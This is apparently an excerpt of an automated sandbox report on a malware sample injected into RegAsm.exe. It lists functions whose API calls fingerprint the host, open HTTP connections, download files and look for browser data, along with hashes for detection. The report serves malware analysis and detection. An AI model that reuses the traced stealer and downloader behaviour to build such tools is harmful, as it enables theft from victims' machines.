                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                                                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                    • API String ID: 47329967-1622206642
                                                                                                                                                                                                                                                    • Opcode ID: 0362846326ce71ba734d08fdefbe86055a277bf58da8f0d7c609a77d097183f7
                                                                                                                                                                                                                                                    • Instruction ID: 4d812e00ed7efdfc56fa22d6bf2b9f094a19d0319c757135d16d31f26b2875e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0362846326ce71ba734d08fdefbe86055a277bf58da8f0d7c609a77d097183f7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18610271E00218ABEB30DBA4DC41BAFBA74AB44714F14453EF514776C1E77CA9488BA9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410BE0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 133memorystringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C18
                                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(00421639,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C51
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410C9D
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00410CA4
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00410CE1
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00426EB0), ref: 00410CF0
                                                                                                                                                                                                                                                      • Part of subcall function 00410B80: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410B95
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00410D12
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: malloc.MSVCRT ref: 00411A21
                                                                                                                                                                                                                                                      • Part of subcall function 00411A10: strncpy.MSVCRT ref: 00411A31
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00410D40
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                    • String ID: :\$C$j{A$j{A
                                                                                                                                                                                                                                                    • API String ID: 2389002695-2806685657
                                                                                                                                                                                                                                                    • Opcode ID: c6907f57d7b0b69bcad3f68aaa3f2a3ed4104bf728b3a5d81b859def5555cabf
                                                                                                                                                                                                                                                    • Instruction ID: 893894b04ace3980e62bb0b39723af3ebf7b8317acdb5c29f8884fc3d2c6ee9c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6907f57d7b0b69bcad3f68aaa3f2a3ed4104bf728b3a5d81b859def5555cabf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3418371900219ABDB10EBE4DD45BEEBBB8EF09704F10056EF905B7281DB786A44CBE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00413A00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 161stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: HttpOpenRequestA.WININET(00000000,GET,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413A94
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00421BF9), ref: 00413AAB
                                                                                                                                                                                                                                                      • Part of subcall function 00411590: LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00413AD7
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413AEC
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413B06
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                                                                    • String ID: C!B$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                    • API String ID: 2440237315-1759700572
                                                                                                                                                                                                                                                    • Opcode ID: 0e96a8b856b38cccec0c7ba89ec05b24b9087011dda1fe97d8b3b3eefa9808aa
                                                                                                                                                                                                                                                    • Instruction ID: 40921d6adc212886bccc595fd23395ae8b4e37a6a44f56a5cdb0f7e06a1c4b2a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e96a8b856b38cccec0c7ba89ec05b24b9087011dda1fe97d8b3b3eefa9808aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5051A630904258EADB10EFA5C9567DDBBB4AF19704F5040BEE805736C2DB7C6B08C7AA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004057A0 Relevance: 15.1, APIs: 10, Instructions: 142networkfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                      • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405805
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,0000000B), ref: 00405831
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405856
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000B), ref: 00405879
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405892
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,000000FF,0041FBF8,00000000,?,?,?,?,?,?,0000000B), ref: 004058B6
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 004058E0
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000B), ref: 004058FC
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00405903
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040590A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 105467990-0
                                                                                                                                                                                                                                                    • Opcode ID: b8c26ef3a759278d12ad385f4820563cbe0f669783da83bf6f96172ec7b81140
                                                                                                                                                                                                                                                    • Instruction ID: 67065f954d04ca421b3934db226f8f0ea0d84fdb2a9ebb2b369e2f00a31ea7dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8c26ef3a759278d12ad385f4820563cbe0f669783da83bf6f96172ec7b81140
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C519475500315ABEB10EBA0CC49FEE7779EF05B04F108569FA05B71C1DB78AA08CBA9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040E800 Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 523COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF800,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E860
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF810,?,?,?,?,?,?,?,?,?,?,?,00000000,00421474,000000FF), ref: 0040E8E2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF830,?,?,?,?,?,?,?,?,?,?,?,00000000,00421474,000000FF), ref: 0040EA06
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF800), ref: 0040EBA4
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF810), ref: 0040EC9D
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040E1D0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426903,00426902,?,?), ref: 0040E22D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$lstrlen
                                                                                                                                                                                                                                                    • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                    • API String ID: 2762123234-4033978473
                                                                                                                                                                                                                                                    • Opcode ID: d34c7f22af68a44a1b0b565ca0b46956f80fdb63cf0c2f1a33097986982441e7
                                                                                                                                                                                                                                                    • Instruction ID: 5534e76143be8b419ec7238555623ea169a4391ec5e5bf997c27e7e318c1e1c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d34c7f22af68a44a1b0b565ca0b46956f80fdb63cf0c2f1a33097986982441e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42326B74900748DFCB14EFA9C545ADEBBF5BF48304F10852EE85AA3791D734AA08CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040E849 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 498COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF800,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E860
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF810,?,?,?,?,?,?,?,?,?,?,?,00000000,00421474,000000FF), ref: 0040E8E2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF830,?,?,?,?,?,?,?,?,?,?,?,00000000,00421474,000000FF), ref: 0040EA06
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF800), ref: 0040EBA4
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,015CF810), ref: 0040EC9D
                                                                                                                                                                                                                                                      • Part of subcall function 0040E1D0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426903,00426902,?,?), ref: 0040E22D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy
                                                                                                                                                                                                                                                    • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                    • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                    • Opcode ID: d6cc198eb1c429e220fe2e1bd9c060a5aad79b8f1d82a8dc58e4fbce93d8bd0b
                                                                                                                                                                                                                                                    • Instruction ID: cc82b531287d5df431aabb217240873c998d12782e394e685e5aa2abd0f1351a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6cc198eb1c429e220fe2e1bd9c060a5aad79b8f1d82a8dc58e4fbce93d8bd0b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB225C74900748DFCB24EFA9C545ADEBBF5BF48304F10856EE846A3791D734AA08CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004180D0 Relevance: 10.6, APIs: 7, Instructions: 69sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: LoadLibraryA.KERNEL32(kernel32.dll,004180E0), ref: 004181D5
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(00000000,015BF468), ref: 004181F0
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF1F8), ref: 0041821D
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF210), ref: 00418236
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF1E0), ref: 0041824E
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF480), ref: 00418266
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015C2F60), ref: 0041827F
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015C29E0), ref: 00418297
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015C2C20), ref: 004182AF
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF4B0), ref: 004182C8
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF498), ref: 004182E0
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF4C8), ref: 004182F8
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF528), ref: 00418311
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015C2A80), ref: 00418329
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF540), ref: 00418341
                                                                                                                                                                                                                                                      • Part of subcall function 004181D0: GetProcAddress.KERNEL32(74DD0000,015BF4E0), ref: 0041835A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004180F2,004271B6), ref: 004100DC
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: HeapAlloc.KERNEL32(00000000,?,?,?,004180F2,004271B6), ref: 004100E3
                                                                                                                                                                                                                                                      • Part of subcall function 004100D0: GetUserNameA.ADVAPI32(00000000,004271B6), ref: 004100F7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015C2E10,?,00427610,?,00000000,004271B6), ref: 00418152
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418161
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001B58), ref: 0041816C
                                                                                                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418182
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041819C
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004181AA
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004181B2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocCreateExitLibraryLoadNameSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3002421637-0
                                                                                                                                                                                                                                                    • Opcode ID: bd1614689fecb1b34e481dc8a1cc0677d402fb202003124903d1bd2b86ed49bd
                                                                                                                                                                                                                                                    • Instruction ID: ae8ab45cac8601a972405e4b939aa9ad87a1f7b82d116ab5b4a405a4d5a3ca31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd1614689fecb1b34e481dc8a1cc0677d402fb202003124903d1bd2b86ed49bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66214F31A442097ADB10FBB1DC5AFEE7779AF15704F50013EB602B24E1DF78694886A9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00404350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63stringnetworkCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
